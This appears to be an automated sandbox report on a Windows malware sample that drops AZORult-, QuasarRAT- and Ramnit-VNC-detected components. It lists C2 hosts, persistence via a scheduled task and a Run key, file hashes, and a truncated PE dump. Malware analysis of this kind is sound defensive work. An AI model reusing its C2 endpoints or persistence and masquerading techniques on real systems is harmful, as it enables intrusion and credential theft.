Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: dropped/vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Contains VNC / remote desktop functionality (version string found)Show sources
                      Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmpString found in binary or memory: RFB 003.008
                      Source: vnc.exeString found in binary or memory: RFB 003.008
                      Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmpString found in binary or memory: RFB 003.008
                      Source: svchost.exeString found in binary or memory: RFB 003.008
                      Source: svchost.exeString found in binary or memory: RFB 003.008
                      Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmpString found in binary or memory: RFB 003.008
                      Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmpString found in binary or memory: RFB 003.008

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Native API 11 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 1 | Input Capture 21 | System Time Discovery 1 | Remote Desktop Protocol 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job 1 | Create Account 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Peripheral Device Discovery 11 | Replication Through Removable Media 1 | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Scheduled Task/Job 1 | Process Injection 612 | Obfuscated Files or Information 21 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Input Capture 21 | Automated Exfiltration | Non-Standard Port 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Registry Run Keys / Startup Folder 1 | Scheduled Task/Job 1 | Software Packing 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Clipboard Data 2 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 1 | Masquerading 11 | LSA Secrets | System Information Discovery 35 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 3 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 14 | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 612 | DCSync | Security Software Discovery 131 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Virtualization/Sandbox Evasion 21 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Application Window Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Masquerade Task or Service | GUI Input Capture | System Network Configuration Discovery 1 | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

                      Behavior Graph

Behavior Graph ID: 492794 | Sample: CVbJSUXraQ | Startdate: 29/09/2021 | Architecture: WINDOWS | Score: 100

• Start: contacts ip-api.com; signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 17 other signatures. Starts CVbJSUXraQ.exe and SystemPropertiesPerformance.exe.
• CVbJSUXraQ.exe: drops C:\Users\...\SystemPropertiesPerformance.exe (PE32); signatures: Detected AZORult Info Stealer; Binary is likely a compiled AutoIt script file; Contains functionality to inject code into remote processes; Uses schtasks.exe or at.exe to add and modify task schedules. Starts vnc.exe, windef.exe, CVbJSUXraQ.exe and schtasks.exe.
• SystemPropertiesPerformance.exe: drops C:\Users\user\AppData\Local\Temp\windef.exe (PE32) and C:\Users\user\AppData\Local\Temp\vnc.exe (PE32); signatures: Antivirus detection for dropped file; Injects a PE file into a foreign processes.
• vnc.exe: signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures. Starts svchost.exe.
• windef.exe: contacts ip-api.com (208.95.112.1, ports 49744, 49746, 80, TUT-ASUS, United States); drops C:\Users\user\AppData\Roaming\...\winsock.exe (PE32); signatures: May check the online IP address of the machine; Hides that the sample has been downloaded from the Internet (zone.identifier).
• CVbJSUXraQ.exe (child process): contacts 0x21.in (50.17.5.224, ports 49743, 8000, AMAZON-AESUS, United States).
• schtasks.exe: starts conhost.exe.
• svchost.exe: contacts 5.8.88.191 (ports 443, 49747, 8080, KOMETA-ASRU, Russian Federation).

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
CVbJSUXraQ.exe | 74% | Virustotal |
CVbJSUXraQ.exe | 69% | Metadefender |
CVbJSUXraQ.exe | 87% | ReversingLabs | Win32.Trojan.Pwsx
CVbJSUXraQ.exe | 100% | Avira | TR/Spy.Agent.zgvfh
CVbJSUXraQ.exe | 100% | Avira | TR/AutoIt.tyemd

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\windef.exe | 100% | Avira | TR/AD.Xiclog.nmpoi
C:\Users\user\btpanui\SystemPropertiesPerformance.exe | 100% | Avira | TR/Spy.Agent.zgvfh
C:\Users\user\btpanui\SystemPropertiesPerformance.exe | 100% | Avira | TR/AutoIt.tyemd
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 100% | Avira | TR/AD.Xiclog.nmpoi
C:\Users\user\AppData\Local\Temp\vnc.exe | 100% | Avira | TR/Hijacker.W
C:\Users\user\AppData\Local\Temp\windef.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\vnc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\vnc.exe | 84% | Virustotal |
C:\Users\user\AppData\Local\Temp\vnc.exe | 93% | ReversingLabs | Win32.Trojan.Carberp
C:\Users\user\AppData\Local\Temp\windef.exe | 86% | Virustotal |
C:\Users\user\AppData\Local\Temp\windef.exe | 93% | ReversingLabs | ByteCode-MSIL.Backdoor.QuasarRAT
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 93% | ReversingLabs | ByteCode-MSIL.Backdoor.QuasarRAT

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.0.svchost.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1122256
5.0.svchost.exe.c60000.3.unpack | 100% | Avira | HEUR/AGEN.1122256
7.2.CVbJSUXraQ.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/Hijacker.W
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
5.2.svchost.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1122256
6.0.windef.exe.f10000.0.unpack | 100% | Avira | HEUR/AGEN.1135947
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/Hijacker.W
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
4.0.vnc.exe.ab0000.0.unpack | 100% | Avira | TR/Hijacker.Gen
7.2.CVbJSUXraQ.exe.db0000.1.unpack | 100% | Avira | TR/Hijacker.W
7.2.CVbJSUXraQ.exe.db0000.1.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
4.2.vnc.exe.ab0000.0.unpack | 100% | Avira | TR/Hijacker.Gen
7.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
7.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
1.3.CVbJSUXraQ.exe.3800000.6.unpack | 100% | Avira | TR/AD.MoksSteal.elw
5.0.svchost.exe.c60000.6.unpack | 100% | Avira | HEUR/AGEN.1122256
1.2.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
1.2.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
1.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
1.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
6.2.windef.exe.f10000.0.unpack | 100% | Avira | HEUR/AGEN.1135947
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack | 100% | Avira | TR/AD.MoksSteal.elw

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://0x21.in:8000/_az/ | 6% | Virustotal |
http://0x21.in:8000/_az/ | 0% | Avira URL Cloud | safe
http://ip-api.com40l | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://dotbit.me/a/ | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
0x21.in | 50.17.5.224 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://0x21.in:8000/_az/ | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | false | | high

                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | windef.exe | false | | high
http://freegeoip.net/xml/ | CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | false | | high
http://ip-api.com40l | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.datacontract.org/2004/07/ | windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | | high
http://api.ipify.org/3 | CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | false | | high
http://ip-api.com/json | CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | false | | high
http://ip-api.com | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | | high
https://dotbit.me/a/ | CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
5.8.88.191 | unknown | Russian Federation | 56541 | KOMETA-ASRU | false
50.17.5.224 | 0x21.in | United States | 14618 | AMAZON-AESUS | false

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:492794
                                        Start date:29.09.2021
                                        Start time:01:34:58
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 14m 38s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:CVbJSUXraQ (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:27
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@33/5@3/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 40.2% (good quality ratio 33.8%)
                                        • Quality average: 65.5%
                                        • Quality standard deviation: 37.8%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.54.113.53, 184.24.20.248, 40.127.240.158, 20.50.102.62
                                        • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
01:36:08 | Task Scheduler | Run new task: RtkAudioService64 path: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
01:36:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"
01:36:14 | Task Scheduler | Run new task: win defender run path: C:\Users\user\AppData\Local\Temp\windef.exe
01:36:14 | API Interceptor | 1x Sleep call for process: windef.exe modified
01:36:21 | API Interceptor | 549x Sleep call for process: winsock.exe modified
01:36:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log
                                        Process:C:\Users\user\AppData\Local\Temp\windef.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1557
                                        Entropy (8bit):5.351891643737667
                                        Encrypted:false
                                        SSDEEP:48:MIHK5HKXE1qHiYHKhQnoNHmHKBfHKntHoxHhAHKzvQTH3:Pq5qXEwCYqhQnoNGqNqntIxHeqzcX
                                        MD5:E9163F5673A58133809F22228C6E27DD
                                        SHA1:236F6A2107AA2EA3092C50A94B72064FA435D4A9
                                        SHA-256:EA9B7A740D92C4113B89E33D9DBB0187CBBF36F2587AA5139421FDBC985EE53D
                                        SHA-512:F3124F6846C4730E04EE36698A88E966AEBBF6F7FCCD0C265A8BE183ADF6C641944B7FA35F0F320F65A36335697D55B44BD34B3494B228737FD63C80151229FF
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, Publi
                                        C:\Users\user\AppData\Local\Temp\vnc.exe
                                        Process:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:6144:k6laOx87Xnl7xKK3iDgExiOP+MrRmD+PQXhEHlIxJKqM01FloHJh7GIA4hVvi:k6YmenBMKSUlm+4arHlgJNGIA4hVvi
                                        MD5:B8BA87EE4C3FC085A2FED0D839AADCE1
                                        SHA1:B3A2E3256406330E8B1779199BB2B9865122D766
                                        SHA-256:4E8A99CD33C9E5C747A3CE8F1A3E17824846F4A8F7CB0631AEBD0815DB2CE3A4
                                        SHA-512:7A775A12CD5BCD182D64BE0D31F800B456CA6D1B531189CEA9C72E1940871CFE92CCD005938F67BFA4784AE44C54B3A7EA29A5BB59766E98C78BF53B680F2AB2
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 84%, Browse
                                        • Antivirus: ReversingLabs, Detection: 93%
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\windef.exe
                                        Process:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
                                        MD5:B4A202E03D4135484D0E730173ABCC72
                                        SHA1:01B30014545EA526C15A60931D676F9392EA0C70
                                        SHA-256:7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
                                        SHA-512:632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 86%
                                        • Antivirus: ReversingLabs, Detection: 93%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{....*"..}....*.....{....*"..}....*...n.(......(.......(....(....*..(.......(....(.......(....(....*...0...........t......-..*.(.....o....o....*...0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&.*.0...............o.....*.0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....
                                        C:\Users\user\AppData\Roaming\SubDir\winsock.exe
                                        Process:C:\Users\user\AppData\Local\Temp\windef.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):357376
                                        Entropy (8bit):6.424314821503838
                                        Encrypted:false
                                        SSDEEP:6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
                                        MD5:B4A202E03D4135484D0E730173ABCC72
                                        SHA1:01B30014545EA526C15A60931D676F9392EA0C70
                                        SHA-256:7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
                                        SHA-512:632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
                                        • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
